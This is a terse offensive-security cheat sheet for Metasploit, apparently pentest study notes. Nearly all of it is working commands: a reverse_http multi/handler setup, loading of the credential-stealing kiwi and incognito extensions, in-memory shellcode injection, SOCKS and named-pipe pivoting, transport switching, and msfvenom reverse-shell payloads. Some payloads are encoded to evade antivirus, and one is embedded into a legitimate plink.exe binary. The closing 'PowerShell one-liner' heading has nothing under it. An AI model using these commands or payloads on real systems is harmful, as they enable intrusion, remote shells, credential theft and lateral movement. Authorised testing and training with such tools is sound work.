Meterpreter
Start
Create a launch (resource) file, file.rb:
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_http
set LHOST $ip
set LPORT 443
set exitfunc thread
set EnableStageEncoding true
set ExitOnSession false
exploit -j
Launch msfconsole with the resource file:
msfconsole -r file.rb
Catch:
Once a session is caught, interact with it and load all extensions:
load bofloader
load espia
load extapi
load incognito
load kiwi
load lanattacks
load peinjector
load powershell
load priv
load python
load sniffer
load stdapi
load unhook
load winpmem
Proxy:
sessions -C 'run autoroute -s 10.10.10.0/24'
search socks
use 0
exploit
Inject binary into memory:
use post/windows/manage/shellcode_inject
set autounhook true
set session X
set shellcode /root/shell.bin
set wait_unhook 20
run
Pivot (named pipe):
First create the named pipe pivot on the existing session:
sessions -i -1
pivot add -t pipe -l <SESSION_HOST> -n msf-pipe -a x64 -p windows
Create and send a payload to the handler:
use payload/windows/x64/meterpreter/reverse_tcp
set lport <PORT>
set lhost <YOUR_HOST>
to_handler
Create the named pipe (SMB) payload:
msfvenom -p windows/x64/meterpreter/reverse_named_pipe lhost=<SESSION_HOST> PIPENAME=msf-pipe --encrypt xor --encrypt-key z -f csharp
Execute it on the target; the new meterpreter session arrives through the pipe.
msfconsole
XXX/shell_reverse_tcp - stageless (not staged)
XXX/shell/reverse_tcp - staged
multi/handler:
show advanced
set EnableStageEncoding true
set StageEncoder x86/shikata_ga_nai
exploit -j
set AutoRunScript post/windows/gather/enum_logged_on_users
jobs -i 1
switch transports:
transport list
transport add -t reverse_tcp -l 192.168.118.2 -p 5555
transport next
Pivot:
route add 192.168.1.0/24 11
msfdb
service postgresql start
msfdb init
workspace -a NEW
workspace NEW
db_nmap -sS -sV -Pn -n 10.11.1.0/24
services
services -p 445 --rhosts
hosts -S windows -R (adds the matching hosts to RHOSTS of the current module; the list can also be filtered further)
creds
loot
msfvenom
PowerShell one-liner:
Embed in an exe:
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.118.2 LPORT=443 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-resources/binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe